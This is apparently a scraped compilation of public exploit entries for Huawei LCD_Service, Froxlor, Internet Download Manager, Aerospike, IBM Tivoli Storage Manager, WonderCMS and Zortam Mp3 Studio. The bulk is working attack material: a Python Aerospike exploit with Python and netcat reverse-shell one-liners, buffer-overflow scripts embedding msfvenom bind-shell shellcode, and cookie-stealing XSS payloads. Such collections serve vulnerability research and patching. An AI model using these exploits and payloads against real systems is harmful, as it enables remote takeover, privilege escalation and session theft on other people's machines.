HireHackking

# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path # Date: 2020-11-07 # Exploit Author: Gerardo González # Vendor Homepage: https://consumer.huawei.com/mx # Software Link: https://consumer.huawei.com/mx # Version: 1.0.1.0 # Tested on: Windows 10 Home Single Language x64 Esp # Step to discover the unquoted Service: C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ # Service info: Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto C:\Users\gerar>sc qc "LCD_Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: LCD_Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Huawei LCD_Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.

# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting # Exploit Author: Vulnerability-Lab # Date: 2020-11-12 # Vendor Homepage: https://froxlor.org/ # Software Link: https://froxlor.org/download/ # Version: 0.10.16 Document Title: =============== Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2241 Release Date: ============= 2020-11-12 Vulnerability Laboratory ID (VL-ID): ==================================== 2241 Common Vulnerability Scoring System: ==================================== 5.2 Vulnerability Class: ==================== Cross Site Scripting - Persistent Current Estimated Price: ======================== 1.000€ - 2.000€ Product & Service Introduction: =============================== Froxlor Server Management Panel, the lightweight server management software for your needs. Developed by experienced server administrators, this open source (GPL) panel simplifies the effort of managing your hosting. Manage reseller ressources and limit what the customers may use in the dedicated customerpanel. MySQL management, Directory protection & settings management. (Copy of the Homepage: https://froxlor.org/index.php & https://froxlor.org/download/ ) Abstract Advisory Information: ============================== The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Froxlor Server Management Panel v0.10.16. Affected Product(s): ==================== Froxlor Team Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel) Affected Packages: Gentoo, Debian & Ubuntu Vulnerability Disclosure Timeline: ================================== 2020-05-01: Researcher Notification & Coordination (Security Researcher) 2020-05-02: Vendor Notification (Security Department) 2020-05-13: Vendor Response/Feedback (Security Department) 2020-10-12: Vendor Fix/Patch (Service Developer Team) ****-**-**: Security Acknowledgements (Security Department) 2020-11-12: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Medium Authentication Type: ==================== Restricted Authentication (Guest Privileges) User Interaction: ================= Low User Interaction Disclosure Type: ================ Full Disclosure Technical Details & Description: ================================ A persistent input validation web vulnerability has been discovered in the Froxlor Server Management Panel v0.10.16 web-application. The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application requests from the application-side. The persistent cross site web vulnerability is located in the `username`, `name` and `firstname` input fields of the customer add or registration module. Remote attackers are able to add customers with malicious script code as firstname or name to manipulate in the backend the `admin_customers.php` and `customers.php` files. The injection point is the registration or customer add/edit module and the execution occurs on preview of the traffic module in the admin backend. The request method to inject is POST and the attack vector is persistent located on the application-side. In a valid attack case the remote attacker uses a customer or reseller account to inject the payload as name to provoke an execute in the insecure backend module. Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious source and persistent manipulation of affected application modules. Request Method(s): [+] POST Vulnerable Input(s): [+] Username [+] Name [+] Firstname Vulnerable Module(s): [+] Customers Vulnerable Parameter(s): [+] name [+] firstname Affected File(s): [+] admin_customers.php Proof of Concept (PoC): ======================= The persistent input validation vulnerability can be exploited by remote attackers with low privilege user account and with low user interaction. For security demonstration or to reproduce the security web vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Register or login with a low privilege user account 2. Open the profile account section 3. Change the name and firstname or include in the registration process Note: Inject test payload to vulnerable marked input fields 4. Save or submit the input via form 5. Wait until an admin or higher privileged user role opens the traffic stats to execute 6. Successful reproduce of the persistent input validation web vulnerability! PoC: Payload (Exploitation) test%20>"<script alert(document.cookie)></script>div style=1 PoC: Vulnerable Sources (Execution Points) [admin_customers.php or customers.php to admin_traffic.php via Name & Firstname] <tr role="row"> <td>>">test%20>"<script alert(document.cookie)></script>div style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]&nbsp; <a href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2" rel="external" target="_blank">[Details]</a></td> <td><small>-</small></td> </tr><tr role="row"> --- PoC Session Logs [POST] --- (Reseller Account to Admin) https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20 Host: froxlor.localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 879 Origin: https://froxlor.localhost:8080 Connection: keep-alive Referer: https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send& new_loginname=test1%20>"<script alert(document.cookie)></script>div style=1&createstdsubdomain=0,1& store_defaultindex=0,1&new_customer_password=KwhyqgzvPo& new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1& name=btest%20>"<script alert(document.cookie)></script>div style=1& firstname=ctest%20>"<script alert(document.cookie)></script>div style=1&gender=0& company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=& custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0& email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1& perlenabled=0&dnsenabled=0&logviewenabled=0 - POST: HTTP/2.0 200 OK server: Apache vary: Accept-Encoding content-encoding: gzip content-length: 1393 content-type: text/html; charset=UTF-8 Reference(s): https://froxlor.localhost:8080/ https://froxlor.localhost:8080/admin_traffic.php https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers Solution - Fix & Patch: ======================= The vulnerability can be patched by follwing the next steps ... 1. Validate and escape the content of the vulnerable username, name and firstname input fields 2. Restrict the input fields and disallow specialchars on inputs to filter 3. Parse the two output location and escape or secure encode the content 4. Encode in the edit formular the results on check Security Risk: ============== The security risk of the persistent validation web vulnerability in the web-application is estimated as medium. Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@ or research@) to get a ask permission. Copyright © 2020 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com

# Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC) # Date: November 18, 2020 # Exploit Author: Vincent Wolterman # Vendor Homepage: http://www.internetdownloadmanager.com/ # Software Link: http://www.internetdownloadmanager.com/download.html # Version: 6.38.12 # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041 # Steps to reproduce crash: # 1) Execute provided Perl code # 2) Open IDMan_Crash.txt output file # 3) Copy contents of text file to clipboard # 4) Open Internet Download Manager 6.38 # 5) From the Menu bar -> Downloads -> Scheduler # 6) Check the box for 'Open the following file when done:' # 7) Paste the contents of IDMan_Crash.txt into the input field below # 8) Click 'Apply' and observe the crash #!/usr/bin/perl $baddata = "\x41" x 1302; $baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1 $baddata .= "\x43"x(5000-length($baddata)); $file = "IDMan_Crash.txt"; open (FILE, '>IDMan_Crash.txt'); print FILE $baddata; close (FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($baddata) . "\n";

# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution # Date: 2020-08-01 # Exploit Author: Matt S # Vendor Homepage: https://www.aerospike.com/ # Version: < 5.1.0.3 # Tested on: Ubuntu 18.04 # CVE : CVE-2020-13151 #!/usr/bin/env python3 import argparse import random import os, sys from time import sleep import string # requires aerospike package from pip import aerospike # if this isn't installing, make sure os dependencies are met # sudo apt-get install python-dev # sudo apt-get install libssl-dev # sudo apt-get install python-pip # sudo apt-get install zlib1g-dev PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&""" NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&' def _get_client(cfg): try: return aerospike.client({ 'hosts': [(cfg.ahost, cfg.aport)], 'policies': {'timeout': 8000}}).connect() except Exception as e: print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}") def _send(client, cfg, _cmd): try: print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd])) except Exception as e: print(f"[-] UDF execution returned {e.msg}") def _register_udf(client, cfg): try: client.udf_put(cfg.udfpath) except Exception as e: print(f"[-] whoops, couldn't register the udf {cfg.udfpath}") raise e def _random_string(l): return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)]) def _populate_table(client, cfg): ns = cfg.namespace setname = cfg.setname print(f"[+] writing to {ns}.{setname}") try: rec = cfg.dummystring client.put((ns, setname, rec), {'pk':cfg.dummystring}) print(f"[+] wrote {rec}") except Exception as e: print(f"[-] unable to write record: {e.msg}") try: if e.msg.startswith('Invalid namespace'): print("Valid namespaces: ") for n in _info_parse("namespaces", client).split(";"): print(n.strip()) except: pass sys.exit(13) def _info_parse(k, client): try: return [i[1] for i in client.info_all(k).values() ][0] except Exception as e: print(f"error retrieving information: {e.msg}") return [] def _is_vuln(_mj, _mi, _pt, _bd): fixed = [5,1,0,0] found = [_mj, _mi, _pt, _bd] if fixed == found: return False for ix, val in enumerate(found): if val < fixed[ix]: return True elif val == fixed[ix]: pass else: return False def _version_check(client): print("[+] aerospike build info: ", end="") try: _ver = _info_parse("build", client) print(_ver) mj, mi, pt, bd = [int(i) for i in _ver.split('.')] if _is_vuln(mj, mi, pt, bd): print("[+] looks vulnerable") return else: print(f"[-] this instance is patched.") sys.exit(0) except Exception as e: print(f"[+] unable to interpret build number due to {e}") print("[+] continuing anyway... ") def _exploit(cfg): client = _get_client(cfg) if not client: return _version_check(client) print(f"[+] populating dummy table.") _populate_table(client, cfg) print(f"[+] registering udf") _register_udf(client, cfg) if cfg.pythonshell or cfg.netcatshell: sys.stdout.flush() print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="") sys.stdout.flush() for i in range(4): print(".", end="") sys.stdout.flush() sleep(1) print(".") _send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) ) if cfg.cmd: print(f"[+] issuing command \"{cfg.cmd}\"") _send(client, cfg, cfg.cmd) if __name__ == '__main__': if len(sys.argv) == 1: print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000") print("... or ... ") print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'") sys.exit(0) parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC') parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1") parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int) parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test") parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None) parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None) parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true") parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true") parser.add_argument("--lhost", help="host to use for reverse shell callback") parser.add_argument("--lport", help="port to use for reverse shell callback") parser.add_argument("--cmd", help="custom command to issue against the underlying host") parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None) cfg = parser.parse_args() if not cfg.setname: cfg.setname = 'cve202013151' if not cfg.dummystring: cfg.dummystring = _random_string(16) if not cfg.udfpath: cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua') assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport" if cfg.pythonshell or cfg.netcatshell: assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell" _exploit(cfg)

# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow # Exploit Author: Paolo Stagno aka VoidSec # Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html # Version: 5.2.0.1 # Tested on: Windows 10 Pro v.10.0.19041 Build 19041 """ Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER" PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1 PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe" FileName : dsmadmc.exe ARCH : I386 DotNET : False ASLR : True DEP : True Authenticode : False StrongNaming : N/A SafeSEH : False ControlFlowGuard : False HighentropyVA : False """ # [ buffer ] # [ 68 byte | EIP | rest of the buffer ] # ^_ESP """ EIP contains normal pattern : 0x33634132 (offset 68) ESP (0x0019e314) points at offset 72 in normal pattern (length 3928) JMP ESP Pointers: 0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0 """ #!/usr/bin/python import struct # 4000 bytes buff_max_length=800 eip_offset=68 """ BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f GOOD CHARS: asciiprint \x20-\x7e MOD CHARS: \x00 -> \x20 ,-----------------------------------------------. | Comparison results: | |-----------------------------------------------| | 80 81 82 83 84 85 86 87| File | 3f 3f 2c 9f 2c 2e 2b d8| Memory 80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File |5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory 90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File |7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File |22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File |2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File |45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File |4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File |8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory f0 |f8 f9 fa fb fc fd fe ff | File |6f 97 a3 96 81 79 5f 98 | Memory `-----------------------------------------------' """ # msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest shellcode = b"" shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49" shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a" shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51" shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78" shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54" shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f" shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b" shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e" shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30" shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42" shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f" shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54" shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34" shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31" shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61" shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35" shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f" shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39" shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d" shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53" shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b" shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c" shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c" shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53" shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c" shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38" shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58" shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49" shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69" shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b" shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72" shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d" shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c" shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76" shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75" shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31" shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f" shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d" shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77" shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79" shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58" shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33" shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63" shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51" shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58" shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63" shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48" shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54" shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42" shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69" shellcode += b"\x6f\x50\x55\x54\x48\x41\x41" buff = "" buff += "A" * eip_offset buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b buff += shellcode buff += "C" * (buff_max_length - len(buff)) print("Writing {} bytes".format(len(buff))) f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w") f.write(buff) f.close()

# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting # Date: 20-11-2020 # Exploit Author: Hemant Patidar (HemantSolo) # Vendor Homepage: https://www.wondercms.com/ # Version: 3.1.3 # Tested on: Windows 10/Kali Linux # CVE: CVE-2020-29233 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. Attack vector: This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Page description. Steps-To-Reproduce: 1. Go to the Simple website builder. 2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>" 3. Now go to the website and the XSS will be triggered. POST /demo/ HTTP/1.1 Host: 127.0.0.1 Connection: close Content-Length: 196 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 DNT: 1 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept: */* Origin: 127.0.0.1 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: 127.0.0.1/demo/ Accept-Encoding: gzip, deflate Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925 fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=

# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH) # Date: November 19, 2020 # Exploit Author: Vincent Wolterman # Vendor Homepage: https://www.zortam.com/index.html # Software Link: https://www.zortam.com/download.html # Version: 27.60 # Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041 # Steps to reproduce crash: # 1) Run provided Perl code Zortam_MP3_Studio_poc.pl # 2) Open Zortam_Crash.txt output file # 3) Copy contents of text file to clipboard # 4) Open Zortam Mp3 Studio # 5) From the Menu bar -> File -> New Library # 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’ # 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field # 8) Click 'OK' # 9) Connect to victim machine on port 80 #!/usr/bin/perl $baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash) $baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272 $nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled # 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50 # (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL) $seh = "\x62\x59\x01\x10"; # seh overwrite $nop = "\x90" x 12; # NOP sled # msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh # Payload size: 355 bytes $payload = "\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" . "\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" . "\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" . "\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" . "\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" . "\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" . "\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" . "\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" . "\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" . "\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" . "\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" . "\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" . "\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" . "\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" . "\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" . "\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" . "\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" . "\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" . "\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" . "\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" . "\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" . "\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" . "\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" . "\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" . "\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" . "\x9b\xec\xb0\xa9\x89"; $file = "Zortam_Crash.txt"; open (FILE, '>Zortam_Crash.txt'); print FILE $baddata; print FILE $nseh; print FILE $seh; print FILE $nop; print FILE $payload; close (FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($baddata) . "\n";

